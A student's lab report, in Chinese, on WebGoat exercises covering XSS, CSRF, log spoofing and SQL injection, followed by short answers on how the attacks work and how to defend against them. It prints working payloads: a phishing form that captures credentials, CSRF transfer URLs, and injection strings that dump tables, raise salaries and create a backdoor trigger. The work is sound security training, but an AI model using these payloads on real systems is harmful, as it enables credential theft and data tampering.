20145206邹京儒 web安全基础实践

20145206邹京儒 web安全基础实践

一、实践过程记录

关于WebGoat

1、我们在命令行里执行：java -jar webgoat-container-7.0.1-war-exec.jar运行WebGoat：



2、在浏览器上访问localhost:8080/WebGoat，进入WebGoat

Cross-Site Scripting（XSS）练习

Phishing with XSS

1、这个题目我们要在搜索框中输入XSS攻击代码，让受害人在我们创建的form中填写用户名和密码，完整的XSS攻击代码如下：

</form>
<script>
    function hack(){
        XSSImage=new Image;
        XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
        alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
    }
</script>
<form name="phish">
<br>
<br>
<HR>
    <H2>This feature requires account login:</H2>
<br>
    <br>Enter Username:<br>
    <input type="text" name="user">
    <br>Enter Password:<br>
    <input type="password" name = "pass">
<br>
    <input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>

输入攻击代码后点击搜索:



登录之后，成功获取！

Stored XSS Attacks

1、在title中随意输入一些东西，然后在message中输入一段代码，比如：<script>alert("20145206 succeed!");</script>

2、提交后，出现如下链接，点击：

3、成功！

Reflected XSS Attacks

1、题目如下：



2、我们将带有攻击性的URL作为输入源，例如输入

Cross Site Request Forgery(CSRF)

1、目的是要写一个URL诱使其他用户点击，从而触发CSRF攻击

2、输入这样一串代码：<img src="http://localhost:8080/WebGoat/attack?Screen=277&menu=900&transferFunds=4000"/>



其中，参数需要自己输入。

3、成功！

CSRF Prompt By-Pass

1、这次包括了两个请求，一是转账请求，二是确认转账成功请求

2、在浏览器中手动输入URL：localhost:8080/WebGoat/attack?Screen=268&menu=900&transferFunds=5000进入确认转账请求页面：

3、点击了CONFIRM按钮之后，再在浏览器中输入URL：localhost:8080/WebGoat/attack?Screen=268&menu=900&transferFunds=CONFIRM，成功！

Injection Flaws练习

Numeric SQL Injection

1、题目如下：



题目大意是这个表单允许使用者看到天气数据，利用SQL注入使得可以看见所有数据！

2、启动BurpSuite，进行相关配置如下：





设置好之后回到题目，任意选择一项，点击GO，然后回到burpsuite。发现多了捕获的包：

右键send to repeater ，我们修改station值从为101 为 101 or 1=1,点击GO



回到Proxy中点击Intercept is on对剩下的包不作处理，回到火狐发现已经成功

Log Spoofing

1、在User Name文本框中输入20145206%0d%0aLogin Succeeded for username: admin

2、如图所示，攻击成功：

String SQL Injection

1、题目大意是：这个表单允许使用者查询他们的信用卡号，使用SQL注入让所有的信用卡号都看得见。

首先试试Smith

2、这里构造语句'or 1='1,成功得到了全部的信用卡号，这样构造的理由是第一个分号用来闭合last_name的第一个分号，而第二个分号用来闭合last_name的第二个分号。这样一条语句被强行拆分成为两条语句！

LAB:SQL Injection(Stage 1:String SQL Injection)

1、以用户Neville登录，但SQL注入后并不成功，查看网页源代码，发现原来有长度限制，修改长度如下：

2、成功登录！

LAB:SQL Injection(Stage 3:Numeric SQL Injection)

1、以用户名Larry登录，登录之后看到浏览员工信息的按钮是ViewProfile：

2、在网页代码中分析一下这个按钮，发现这个地方是以员工ID作为索引传递参数的，我们要达到通过Larry来浏览老板账户信息的目的，一般来说老板的工资都应该是最高的，所以把其中的value值改为101 or 1=1 order by salary desc --，这样老板的信息就会被排到第一个：



3、成功！

Database Backdoors

1、先输一个101，得到了该用户的信息：

2、输入注入语句：101; update employee set salary=10000成功把该用户的工资涨到了10000：

3、接下来使用语句101;CREATE TRIGGER 5206BackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='20145206@163.com' WHERE userid = NEW.userid创建一个后门，把表中所有的邮箱和用户ID都设为我的：

Blind Numeric SQL Injection

1、首先尝试默认的101，发现显示Account number is valid，说明这个是真！



2、看了zqh同学的博客，知道了确定了上下界之后每次使用二分法就可以得到结果了！

最终结果：

一共完成12道题目。

二、实验后回答问题

（1）SQL注入攻击原理，如何防御

原理：

SQL注入攻击的基本原理，是从客户端合法接口提交特殊的非法代码，让其注入到服务器端执行业务的SQL中去，进而改变SQL语句的原有逻辑和影响服务器端正常业务的处理。

防御：

执行验证的SQL语句；

使用正则表达式屏蔽特殊字符；

使用PreparedStatement代替Statement；

（2）XSS攻击的原理，如何防御

原理：

XSS攻击的主要目的则是，想办法获取目标攻击网站的cookie，因为有了cookie相当于有了seesion，有了这些信息就可以在任意能接进互联网的pc登陆该网站，并以其他人的生份登陆，做一些破坏。

防御：

当恶意代码值被作为某一标签的内容显示：在不需要html输入的地方对html 标签及一些特殊字符( ” < > & 等等 )做过滤，将其转化为不被浏览器解释执行的字符。

当恶意代码被作为某一标签的属性显示，通过用 “将属性截断来开辟新的属性或恶意方法：属性本身存在的 单引号和双引号都需要进行转码；对用户输入的html 标签及标签属性做白名单过滤，也可以对一些存在漏洞的标签和属性进行专门过滤。

（3）CSRF攻击原理，如何防御

原理：

CSRF攻击的主要目的是让用户在不知情的情况下攻击自己已登录的一个系统，类似于钓鱼。

防御：

通过 referer、token 或者 验证码 来检测用户提交。

尽量不要在页面的链接中暴露用户隐私信息。

对于用户修改删除等操作最好都使用post 操作 。

避免全站通用的cookie，严格设置cookie的域。

三、实验总结与体会

这次的实验主要是练习题目，虽然有的题目不是能够完全看懂，但通过参考其他同学的博客也顺利完成了，我觉得重要的是了解每个实验的原理吧，就比如说SQL注入，其实输入的字符串每次利用的原理都一样的，知道原理就好办多了。这次的实验多在实践，“实践是检验真理的唯一标准”没错的，通过实战对这部分知识掌握的更透彻了。